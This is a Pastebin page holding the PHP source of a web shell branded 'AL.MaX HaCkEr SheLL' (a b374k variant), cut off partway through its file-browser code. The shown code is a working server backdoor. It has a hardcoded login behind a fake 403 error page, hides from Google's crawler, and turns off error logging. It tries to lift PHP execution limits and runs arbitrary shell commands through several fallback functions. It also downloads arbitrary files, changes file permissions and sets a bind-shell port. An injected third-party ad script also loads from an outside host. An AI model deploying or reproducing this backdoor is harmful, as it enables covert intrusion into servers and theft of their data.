Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- ###########################################
- # Private ! AL.MaX HaCkEr SheLL #
- # AL.MaX HaCkEr #
- # Gun@linuxmail.org #
- ###########################################
- //Change User & Password
- $tacfgd['uname'] = 'AL.MaX HaCkEr';
- $tacfgd['pword'] = 's4cuc:518';
- // Title of page.
- $tacfgd['title'] = '';
- // Text to appear just above login form.
- $tacfgd['helptext'] = '';
- // Set to true to enable the optional remember-me feature, which stores encrypted login details to
- // allow users to be logged-in automatically on their return. Turn off for a little extra security.
- $tacfgd['allowrm'] = true;
- // If you have multiple protected pages, and there's more than one username / password combination,
- // you need to group each combination under a distinct rmgroup so that the remember-me feature
- // knows which login details to use.
- $tacfgd['rmgroup'] = 'default';
- // Set to true if you use your own sessions within your protected page, to stop txtAuth interfering.
- // In this case, you _must_ call session_start() before you require() txtAuth. Logging out will not
- // destroy the session, so that is left up to you.
- $tacfgd['ownsessions'] = false;
- foreach ($tacfgd as $key => $val) {
- if (!isset($tacfg[$key])) $tacfg[$key] = $val;
- }
- if (!$tacfg['ownsessions']) {
- session_name('txtauth');
- session_start();
- }
- // Logout attempt made. Deletes any remember-me cookie as well
- if (isset($_GET['logout']) || isset($_POST['logout'])) {
- setcookie('txtauth_'.$rmgroup, '', time()-86400*14);
- if (!$tacfg['ownsessions']) {
- $_SESSION = array();
- session_destroy();
- }
- else $_SESSION['txtauthin'] = false;
- }
- // Login attempt made
- elseif (isset($_POST['login'])) {
- if ($_POST['uname'] == $tacfg['uname'] && $_POST['pword'] == $tacfg['pword']) {
- $_SESSION['txtauthin'] = true;
- if ($_POST['rm']) {
- // Set remember-me cookie for 2 weeks
- setcookie('txtauth_'.$rmgroup, md5($tacfg['uname'].$tacfg['pword']), time()+86400*14);
- }
- }
- else $err = 'Login Faild !';
- }
- // Remember-me cookie exists
- elseif (isset($_COOKIE['txtauth_'.$rmgroup])) {
- if (md5($tacfg['uname'].$tacfg['pword']) == $_COOKIE['txtauth_'.$rmgroup] && $tacfg['allowrm']) {
- $_SESSION['txtauthin'] = true;
- }
- else $err = 'Login Faild !';
- }
- if (!$_SESSION['txtauthin']) {
- @ini_restore("safe_mode");
- @ini_restore("open_basedir");
- @ini_restore("safe_mode_include_dir");
- @ini_restore("safe_mode_exec_dir");
- @ini_restore("disable_functions");
- @ini_restore("allow_url_fopen");
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- ?>
- <html dir=rtl>
- <head>
- <STYLE>
- * {
- padding:0;
- margin:0;
- }
- div.end *
- {
- font-size:small;
- }
- div.end
- {
- width:100%;
- background:#222;
- }
- body
- {
- background-color:black;
- color:rgb(35,182,39);
- font-family:Tahoma,Verdana,Arial;
- font-size: small;
- }
- input.own {
- background-color: Green;
- color: white;
- border : 1px solid #ccc;
- }
- blockquote.small
- {
- font-size: smaller;
- color: silver;
- text-align: center;
- }
- table.files
- {
- border-spacing: 10px;
- font-size: small;
- }
- h1 {
- padding: 4px;
- padding-bottom: 0px;
- margin-right : 5px;
- }
- div.logo
- {
- border-right: 1px aqua solid;
- }
- div.header
- {
- padding-left: 5px;
- font-size: small;
- text-align: left;
- }
- div.nav
- {
- margin-top:1px;
- height:30px;
- background-color: #ccc;
- }
- div.nav ul
- {
- list-style: none;
- padding: 4px;
- }
- div.nav li
- {
- float: left;
- margin-right: 10px;
- text-align:center;
- }
- textarea.cmd
- {
- border : 1px solid #111;
- background-color : green;
- font-family: Shell;
- color : black;
- margin-top: 10px;
- font-size:small;
- }
- input.cmd
- {
- background-color:black;
- color: white;
- width: 400px;
- border : 1px solid #ccc;
- }
- td.maintext
- {
- font-size: large;
- }
- #margins
- {
- margin-left: 50px;
- margin-top: 10px;
- color:white;
- }
- table.top
- {
- border-bottom: 1px solid aqua;
- width: 100%;
- }
- #borders
- {
- border-top : 1px solid aqua;
- border-left:1px solid aqua;
- border-bottom: 1px solid aqua;
- border-right: 1px solid aqua;
- margin-bottom:0;
- }
- td.file a
- {
- color : aqua;
- text-decoration:none;
- }
- td.dir a
- {
- color : white;
- text-decoration:none;
- }
- td.download,td.download2
- {
- color:green;
- }
- #spacing
- {
- padding:10px;
- margin-left:200px;
- }
- th.header
- {
- background: none repeat scroll 0 0 #191919;
- color: black;
- border-bottom : 1px solid #333333;
- }
- img.imageForm
- {
- padding: 53px;
- }
- </STYLE>
- <script language=\'javascript\'>
- function hide_div(id)
- {
- document.getElementById(id).style.display = \'none\';
- document.cookie=id+\'=0;\';
- }
- function show_div(id)
- {
- document.getElementById(id).style.display = \'block\';
- document.cookie=id+\'=1;\';
- }
- function change_divst(id)
- {
- if (document.getElementById(id).style.display == \'none\')
- show_div(id);
- else
- hide_div(id);
- }
- </script>
- <body>
- <br>
- <form name="txtauth" action="/40.php" method="post">
- <div align="center" style="width: 1113px; height: 306px" class="style40">
- <pre>
- </b></font><font color="grey"><b><img alt="" src="http://www.iconeasy.com/icon/png/Flag/Africa/Sudan.png" width="256" height="256" style="float: left"></b></font></pre>
- <pre>
- </pre>
- <pre>
- </pre>
- <pre>
- </pre>
- <pre>
- </pre>
- <pre>
- </pre>
- <pre>
- </pre>
- <pre>
- <img alt="" src="http://www.up-king.com:8080/almaciat/ufph33in38ifue6yswzh.png" style="float: left" width="307" height="165"><b><font color="grey">
- </font></b><font color="grey">
- <pre>
- </pre>
- </div>
- </form>
- <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582AaN6h071sG%2bV99GKy6ADz5gSD80OQ9zKugYPkVGpwykNaXXA7o1AVBfE3sfQ4WIM2S5oX0Y6oI5vMVfQZ4ipKT5tFV8Tp7Rmlo0KC6cA6MNA41KeAtrcw8o6ggSZeWhN%2fow59e4%2fhzJSR2orvPml20fVyw%2fMNwQhbuBapd2ZO5zWLEIzZYlUctH0W0oLVCOpVKHNOWkXsy4Js%2fBl8mGu5VJNUlTwXiNq97a9YJIe0dR193%2bfs3Ms0TqxsjnGBDdzV7yrpng%2fW8pL97cYRKdiqJqhmElLElRRQA4J3crpUKulLxn74n2qHQDOxYORpfWETL3gXFVIwKMjz0u0tGpC5RVEUrXFSPwdrnFpjCFSdbIc2ZDCoTVZl9Cv6v%2f0SssXZ1EmfbIM1YubKvQ%2bwDR3z0PCvF20rGjpO%2b%2fC61q3HR3C8RMHXfge8NU6XqPU%2f0hJ%2fo8muHhvP6wb0VCt3i5yg7Xjj6008hH6Q%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
- </html>
- <html dir=rtl>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
- <title>Private ! .. AL.MaX HaCkEr SheLL </title>
- <STYLE>
- BODY
- {
- }
- tr {
- }
- BODY {
- margin: 1;
- color: #dadada;
- background-color: #000000;
- }
- A:link {COLOR:red; TEXT-DECORATION: none}
- A:visited { COLOR:red; TEXT-DECORATION: none}
- A:active {COLOR:red; TEXT-DECORATION: none}
- A:hover {color:blue;TEXT-DECORATION: none}
- </STYLE>
- <script language=\'javascript\'>
- function hide_div(id)
- {
- document.getElementById(id).style.display = \'none\';
- document.cookie=id+\'=0;\';
- }
- function show_div(id)
- {
- document.getElementById(id).style.display = \'block\';
- document.cookie=id+\'=1;\';
- }
- function change_divst(id)
- {
- if (document.getElementById(id).style.display == \'none\')
- show_div(id);
- else
- hide_div(id);
- }
- </script>
- <body>
- <form name="txtauth" action="<?=$action?>" method="post">
- <div class="style34" style="width: 1043px; height: 67px;">
- <table cellpadding="4" cellspacing="0" style="width: 216px;" dir="ltr" class="style35" align="center">
- <?=(isset($err))?'<tr><td colspan="2" align="center"><font color="red">'.$err.'</font></td></tr>':''?>
- <?if (isset($tacfg['uname'])) {?>
- <tr><td>User:</td><td class="style37"><input type="text" name="uname" value="" size="20" maxlength="100" class="txtbox"></td></tr>
- <?}?>
- <tr><td>Password:</td><td class="style36"><input type="password" name="pword" value="" size="20" maxlength="100" class="txtbox"></td></tr>
- <?if ($tacfg['allowrm']) {?>
- <tr><td><input type="submit" name="login" value="Login">
- </td><td><input type="checkbox" name="rm" id="rm"><label for="rm">
- Remmeber Me?</label></td></tr>
- <?} else {?>
- <tr><td colspan="2">
- <input type="submit" name="login" value="Login"></td></tr>
- <?}?>
- </table>
- </div>
- </form>
- <div>
- <br><br>
- </div>
- <div class="smalltxt" align="center"><font color="grey">
- <div class="end">
- <p align="center"><b> </b><br />
- </p>
- <table style="border: 2px solid rgb(218, 218, 218);" width="100%" bgcolor="#000000" height="%">
- <tr>
- <td><center><font color="white" face="tahoma" size="4"><b>
- [
- <span class="style27"> <font color="red" size="5"><span style="font-weight: 700; filter: blur(add=1, direction=270, strength=30)"><font class="whiteglow" face="tahoma"><span <ul=""><font color="#808080" face="Tahoma"><span <ul="" lang="en-us"><font color="white" face="tahoma" size="4"><span class="style41">Private
- ! .. AL.MaX HaCkEr SheLL</span><span class="style25"><font color="Green"><font class="style26" color="gray" size="-2"><span class="style21"><strong>
- <font color="white" face="tahoma" size="4">|</font> v.</strong>3</span></font></font></span></font>
- - Copyright
- / <font color="#FFFFFF" face="Tahoma">2013
- <a style="text-decoration: none; " href="http://www.zone-h.com/archive/notifier=AL.MaX%20HaCkEr">
- <font color="#FFFFFF">AL.MaX HaCkEr </font></a></font></span>
- <font color="#000000">
- </font></font></span></font></span></font></span> ]<span class="style27">
- </span> <br>
- <span class="style27"> <font color="red" size="5"><span style="font-weight: 700; filter: blur(add=1, direction=270, strength=30)"><font class="whiteglow" face="tahoma"><span <ul=""><font color="#808080" face="Tahoma">
- <font color="#000000">
- <a style="text-decoration: none" href="http://www.zone-h.com/archive/notifier=AL.MaX%20HaCkEr">
- <font color="#808080" face="Tahoma">Zone-h</font></a><font color="red" size="5" face="tahoma"><font class="whiteglow" face="tahoma"><font color="#808080" face="Tahoma"> <img alt="" src="http://www.senojflags.com/images/national-flag-icons/Sudan-Flag.png" height="16" width="16"></font></font></font> </font></font>
- </span></font></span></font> </span>
- </b>
- <strong class="style42">Gun@Linuxmail.Org</strong></font></center></td>
- </tr>
- </table>
- <p align="center"> </p>
- </div>
- </font></div>
- </body>
- </html>
- <?
- // Don't delete this!
- exit();
- }
- ?>
- </p>
- <div class="style38">
- <div class="style38">
- <?php
- /*********************************************************************************************************/
- $auth_pass = ""; //password crypted with md5, default is 'AL.MaX HaCkEr'
- /*********************************************************************************************************/
- $color = "#00ff00";
- $default_action = 'FilesMan';
- @define('SELF_PATH', __FILE__);
- /*********************************************************************************************************/
- # Avoid google's crawler
- if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; }
- /*********************************************************************************************************/
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @set_time_limit(0);
- @set_magic_quotes_runtime(0);
- @define('VERSION', 'v.2012');
- @define('TITLE', ':: b374k AL.MaX HaCkEr 2012 ::');
- /*********************************************************************************************************/
- if( get_magic_quotes_gpc() )
- {
- function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); }
- $_POST = stripslashes_array($_POST);
- }
- function logout()
- {
- unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
- $page = $host='http://'.$_SERVER['SERVER_NAME'].'/'.$_SERVER['PHP_SELF'];
- echo '<center><span class="b1">The System Is Going To Down For LogOut Administrator Pages!!</scan></center>';
- ?>
- <script>window.location.href = '<?php print $page; ?>';</script>
- <?php
- exit(0);
- }
- function myshellexec($command) {
- if (!($p=popen("($command)2>&1","r"))) {
- return 126;
- }
- while (!feof($p)) {
- $line=fgets($p,1000);
- $out .= $line;
- }
- pclose($p);
- return $out;
- }
- function parsesort($sort)
- {
- $one = intval($sort);
- $second = substr($sort,-1);
- if ($second != "d") {$second = "a";}
- return array($one,$second);
- }
- $disablefunc = @ini_get("disable_functions");
- function showdisablefunctions() {
- if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:#00FF1E'>".$disablefunc."</span>"; }
- else { return "<span style='color:#00FF1E'>NONE</span>"; }
- }
- function ex($cfe) {
- $res = '';
- if (!empty($cfe)) {
- if(function_exists('exec')) {
- @exec($cfe,$res);
- $res = join("\n",$res);
- } elseif(function_exists('shell_exec')) {
- $res = @shell_exec($cfe);
- } elseif(function_exists('system')) {
- @ob_start();
- @system($cfe);
- $res = @ob_get_contents();
- @ob_end_clean();
- } elseif(function_exists('passthru')) {
- @ob_start();
- @passthru($cfe);
- $res = @ob_get_contents();
- @ob_end_clean();
- } elseif(@is_resource($f = @popen($cfe,"r"))) {
- $res = "";
- while(!@feof($f)) { $res .= @fread($f,1024); }
- @pclose($f);
- } else { $res = "Ex() Disabled!"; }
- }
- return $res;
- }
- function showstat($stat) {
- if ($stat=="on") { return "<b><font style='color:#00FF00'>ON</font></b>"; }
- else { return "<b><font style='color:#DD4736'>OFF</font></b>"; }
- }
- function testperl() {
- if (ex('perl -h')) { return showstat("on"); }
- else { return showstat("off"); }
- }
- function testfetch() {
- if(ex('fetch --help')) { return showstat("on"); }
- else { return showstat("off"); }
- }
- function testwget() {
- if (ex('wget --help')) { return showstat("on"); }
- else { return showstat("off"); }
- }
- function testoracle() {
- if (function_exists('ocilogon')) { return showstat("on"); }
- else { return showstat("off"); }
- }
- function testpostgresql() {
- if (function_exists('pg_connect')) { return showstat("on"); }
- else { return showstat("off"); }
- }
- function testmssql() {
- if (function_exists('mssql_connect')) { return showstat("on"); }
- else { return showstat("off"); }
- }
- function testcurl() {
- if (function_exists('curl_version')) { return showstat("on"); }
- else { return showstat("off"); }
- }
- function testmysql() {
- if (function_exists('mysql_connect')) { return showstat("on"); }
- else { return showstat("off"); }
- }
- $quotes = get_magic_quotes_gpc();
- if ($quotes == "1" or $quotes == "on")
- {
- $quot = "<font style='color:red'>ON</font>";
- }
- else
- {
- $quot = "<font style='color:green'>OFF</font>";
- }
- function printLogin()
- {
- ?>
- <html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
- <head>
- <style> input { margin:0;background-color:#fff;border:1px solid #fff; } </style>
- </head>
- <title>
- 403 Forbidden
- </title>
- <body>
- </div>
- <h1 class="style38">Forbidden</h1>
- <p class="style38">You don't have permission to access this file on this server <?=$_SERVER['HTTP_HOST']?>.</p>
- <hr>
- <form method=post>
- <address class="style38">Apache/2.2.8 at <?=$_SERVER['HTTP_HOST']?> Port 80<center class="style38"><input type=password name=x><input type=submit value=''></center></address>
- </form>
- <div class="style38">
- </body>
- </html>
- <?php
- exit;
- }
- if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
- {
- if( empty( $auth_pass ) || ( isset( $_POST['x'] ) && ( md5($_POST['x']) == $auth_pass ) ) )
- { $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; }
- else
- { printLogin(); }
- }
- if(isset($_GET['dl']) && ($_GET['dl'] != ""))
- {
- $file = $_GET['dl'];
- $filez = @file_get_contents($file);
- header("Content-type: application/octet-stream");
- header("Content-length: ".strlen($filez));
- header("Content-disposition: attachment;
- filename=\"".basename($file)."\";");
- echo $filez;
- exit;
- }
- elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != ""))
- {
- $file = $_GET['dlgzip'];
- $filez = gzencode(@file_get_contents($file));
- header("Content-Type:application/x-gzip\n");
- header("Content-length: ".strlen($filez));
- header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
- echo $filez; exit;
- }
- if(isset($_GET['img']))
- {
- @ob_clean();
- $d = magicboom($_GET['y']);
- $f = $_GET['img'];
- $inf = @getimagesize($d.$f);
- $ext = explode($f,".");
- $ext = $ext[count($ext)-1];
- @header("Content-type: ".$inf["mime"]);
- @header("Cache-control: public");
- @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
- @header("Cache-control: max-age=".(60*60*24*7));
- @readfile($d.$f);
- exit;
- }
- $ver = VERSION;
- $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
- if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE;
- else $safemode = FALSE;
- $system = @php_uname();
- if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
- else $win = FALSE;
- if(isset($_GET['y']))
- { if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } }
- if(!$win)
- { if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; }
- else
- {
- $user = @get_current_user();
- $id = $user;
- $prompt = $user." >";
- $pwd = realpath(".")."\\";
- $v = explode("\\",$d);
- $v = $v[0];
- foreach (range("A","Z") as $letter)
- {
- $bool = @is_dir($letter.":\\");
- if ($bool)
- {
- $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
- if ($letter.":" != $v) {$letters .= $letter;}
- else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
- $letters .= " ]</a> ";
- }
- }
- }
- if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
- else $posix = FALSE;
- $bytes = disk_free_space(".");
- $si_prefix = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
- $base = 1024;
- $class = min((int)log($bytes , $base) , count($si_prefix) - 1);
- $totalspace_bytes = disk_total_space(".");
- $totalspace_si_prefixs = array( 'B', 'KB', 'MB', 'GB', 'TB', 'EB', 'ZB', 'YB' );
- $totalspace_bases = 1024;
- $totalspace_class = min((int)log($totalspace_bytes , $totalspace_bases) , count($totalspace_si_prefixs) - 1);
- $totalspace_show = sprintf('%1.2f' , $totalspace_bytes / pow($totalspace_bases,$totalspace_class)) . ' ' . $totalspace_si_prefixs[$totalspace_class] . '';
- $freespace_show = sprintf('%1.2f' , $bytes / pow($base,$class)) . ' ' . $si_prefix[$class] . '';
- $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
- $my_ip = $_SERVER['REMOTE_ADDR'];
- $bindport = "55555";
- $bindport_pass = "AL.MaX HaCkEr";
- $pwds = explode(DIRECTORY_SEPARATOR,$pwd);
- $pwdurl = "";
- for($i = 0 ; $i < sizeof($pwds)-1 ; $i++)
- {
- $pathz = "";
- for($j = 0 ; $j <= $i ; $j++)
- {
- $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
- }
- $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
- }
- if(isset($_POST['rename'])){
- $old = $_POST['oldname'];
- $new = $_POST['newname'];
- @rename($pwd.$old,$pwd.$new);
- $file = $pwd.$new;
- }
- if(isset($_POST['chmod'])){
- $name = $_POST['name'];
- $value = $_POST['newvalue'];
- if (strlen($value)==3){
- $value = 0 . "" . $value;
- }
- @chmod($pwd.$name,octdec($value));
- $file = $pwd.$name;
- }
- if(isset($_POST['chmod_folder'])){
- $name = $_POST['name'];
- $value = $_POST['newvalue'];
- if (strlen($value)==3){
- $value = 0 . "" . $value;
- }
- @chmod($pwd.$name,octdec($value));
- $file = $pwd.$name;
- }
- $buff = $DISP_SERVER_SOFTWARE."<br />";
- $buff .= '<font style="color:#F58F78">'.$system.'</font><br />';
- if($id != "") $buff .= $id."<br />";
- $buff .= "Server IP : "."<span style='color:#FF8800'>$server_ip</span>"."<font> | </font>"."Your IP : "."<span style='color:#FF0000'>$my_ip</span>"."<br />";
- $buff .= "Total HDD Space : "."<span style='color:#00FF1E'>$totalspace_show</span>"."<font> | </font>"."Free HDD Space : "."<span style='color:#00FF1E'>$freespace_show</span>"."<br />";
- $buff .= "Magic Quotes:$quot"."<br>";
- $buff .= "Disabled Functions: ".showdisablefunctions()."<br>";
- $buff .= "MySQL: ".testmysql()." MSSQL: ".testmssql()." Oracle: ".testoracle()." MSSQL: ".testmssql()." PostgreSQL: ".testpostgresql()." cURL: ".testcurl()." WGet: ".testwget()." Fetch: ".testfetch()." Perl: ".testperl()."<br>";
- if($safemode) $buff .= "safemode <span class=\"gaya\">ON</span><br />";
- else $buff .= "safemode <span class=\"gaya\">OFF<span><br />";
- $buff .= $letters." > ".$pwdurl;
- function rapih($text){ return trim(str_replace("<br />","",$text)); }
- function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); }
- function showdir($pwd,$prompt)
- {
- $fname = array();
- $dname = array();
- if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
- else $posix = FALSE;
- $user = "????:????";
- if($dh = opendir($pwd))
- {
- while($file = readdir($dh))
- {
- if(is_dir($file))
- { $dname[] = $file; }
- elseif(is_file($file))
- { $fname[] = $file; }
- }
- closedir($dh);
- }
- sort($fname);
- sort($dname);
- $path = @explode(DIRECTORY_SEPARATOR,$pwd);
- $tree = @sizeof($path);
- $parent = "";
- $buff = "<form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
- <table class=\"cmdbox\" style=\"width:50%;\">
- <tr>
- <td>CMD@$prompt</td>
- <td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" />
- <input class=\"inputzbut\" type=\"submit\" value=\"Execute !\" name=\"submitcmd\" style=\"width:80px;\" /></td>
- </tr>
- </form>
- <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
- <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
- <tr>
- <td>view file/folder</td>
- <td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" />
- <input class=\"inputzbut\" type=\"submit\" value=\"Enter !\" name=\"submitcmd\" style=\"width:80px;\" /></td>
- </tr>
- </form>
- </table>
- <table class=\"explore\">
- <tr>
- <th>name</th>
- <th style=\"width:80px;\">size</th>
- <th style=\"width:210px;\">owner:group</th>
- <th style=\"width:80px;\">perms</th>
- <th style=\"width:110px;\">modified</th>
- <th style=\"width:190px;\">actions</th>
- </tr> ";
- if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
- else $parent = $pwd;
- foreach($dname as $folder)
- {
- if($folder == ".")
- {
- if(!$win && $posix)
- {
- $name=@posix_getpwuid(@fileowner($folder));
- $group=@posix_getgrgid(@filegroup($folder));
- $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
- }
- else { $owner = $user; }
- $buff .= "<tr>
- <td><a href=\"?y=".$pwd."\">$folder</a></td>
- <td>-</td>
- <td style=\"text-align:center;\">".$owner."</td>
- <td><center>".get_perms($pwd)."</center></td>
- <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td>
- <td><span id=\"titik1\">
- <a href=\"?y=$pwd&edit=".$pwd."newfile.php\">newfile</a>
- | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a>
- </span>
- <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
- <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
- </form>
- </td>
- </tr> ";
- }
- elseif($folder == "..")
- {
- if(!$win && $posix)
- {
- $name=@posix_getpwuid(@fileowner($folder));
- $group=@posix_getgrgid(@filegroup($folder));
- $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
- }
- else { $owner = $user; }
- $buff .= "<tr>
- <td>
- <a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAadEVYdFNvZnR3YXJlAFBhaW50Lk5FVCB2My41LjEwMPRyoQAAAgZJREFUOE9jYKAF4I7ez6CVfVQvpOOiGcnm8yUdYVRvuWalvvjNTemqi01cUfuJN4Mv/QSjRsdNG81VH6/Lb/vzT6juWhtP/CFGokwQyD3DqNpxy1Zj5YdrCjv+/Zfb+uefSNPNNt6044QNECy5wKjUesNadcHr63Jrv/2XAWL5NV//W819sk9/6sMcMJ4GwXpTHiboTLpvpzXhnoxx/x0WBsHKywzyjdfNlKY9uSU1781/SSQsMef1f4nZr1DxrJcvJWe+XC45/XmIQv8DfgbBqqvScl1374r1Pfwv2gvDD4BsGIaIgeTF+h/9F5vw+I3YxMfrxCY+iQLyBRlEaq+JSjTdWCfRfPOPUMON/zAsDGSLNt38L4aGRZtvvhFrvrVOtOV2FBALMgjVXGMUb7qpIdNxZ51U193fIu13/4OwKBDrdj74bDbzwRNkbDrj/mXj6fdnGk6976/Xd58fHEPA0GaS7LirLdf3YI10/8NfolDviLU8WAQ01E66664tHHffNZftuasq33NPWLXjPgs8ikU77jFL9T3UkZ38ZI3U1Ge/xKc8+wf0Z5tI5z1GoIvQMQNQjEG07S5qEhHve8QsNfmpjvSM52ukZ736JT7pRRvQIMLpANkYoAZm6ZkvtDVmvVktWPK6SmL6K9IMABkmM/slk+qMN7Iy/W/kxKe/ISolk60IAJfcKhfb3kZPAAAAAElFTkSuQmCC' /> $folder</a></td>
- <td>-</td>
- <td style=\"text-align:center;\">".$owner."</td>
- <td><center>".get_perms($parent)."</center></td>
- <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
- <td><span id=\"titik2\">
- <a href=\"?y=$pwd&edit=".$parent."newfile.php\">newfile</a>
- | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a>
- </span>
- <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
- <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
- </form>
- </td>
- </tr>";
- }
- else
- {
- if(!$win && $posix)
- {
- $name=@posix_getpwuid(@fileowner($folder));
- $group=@posix_getgrgid(@filegroup($folder));
- $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
- }
- else { $owner = $user; }
- $buff .= "<tr>
- <td>
- <a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAALGPC/xhBQAAAAlwSFlzAAAOwgAADsIBFShKgAAAABp0RVh0U29mdHdhcmUAUGFpbnQuTkVUIHYzLjUuMTAw9HKhAAACkUlEQVQ4T8WT2UvUURzFz2NRT5pab9ZDYZNMLjNq6rg1Fqhl5cw8qA+2kJmBgxKUhVpW4y6FZblkaRROpkQLITKG1ERhC5JMuaVmzuQWBD3e27nN0D/QQz/48P1+7znne+/LD/jvn14XtUYXqU+O0kebY2NiLfFxBkuiIcmSnJRiMe5MtexK3W02phjNSYnJZkN8gikmeoeJGRMzRr1OvxZbQzTBZCBUE+oJD4vwcJEnNibOY4hL8HCRJzEh6U/PMzc1d/j2CPc2TaibmSFNiGYT7hT7nbyU579y4dA6WXUsQNacCJR1RYGyoThINpZs8LFe1luD/mi2/ABZedBf2vL8fnSV+JdhohZPJ+sgv16H9NyGXOyGXH4AudLLetfLSh8rZ6Upj/JOMTNRAwfGa9A3Wetb0OlbQPPSffZdXpbZ/11Aj1qgMuPVeIYxG7rGbZAzTZDzHZDfeeOindxjf5M3tkMuMLTEswVqyjNzleEqSGZ74KrEZVcFn1QPMcfN7g4IPlPMN0N8a/IyR9xthJryTDVAuM5Bus6jBaPlKB85xW0XIaYb+bxrkLNXIL5UQxJVxRRfOM0LZnmz8iivyoyWwYaRUhS8LYL4WArxuRJiooq1AuLTGR9nOZd5z5Q2Ro/yqszIaVgxbEXmy8OQbwoh3pdAvrNCvD4KMXwccriAVVFIPR/iQzGhR3lfMMOsCY4chPVb8JPIwVzI5zmQA2aI/
- izO7AezOVNzZEMM5VGnR3nJL0cuInErHcH2DHTb0+DszcSrh1lwPjb7sMD5hKj5kQlOpfXRY0+HszsDPZ0Z2IjcMKyuTsXm5jRob+yBtnUftG0HSBa07QqTt7bu92ote6FtToeWmS1HdFj1zz/zb9ZqmlZ866Y6AAAAAElFTkSuQmCC' /> [ $folder ]</a>
- <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
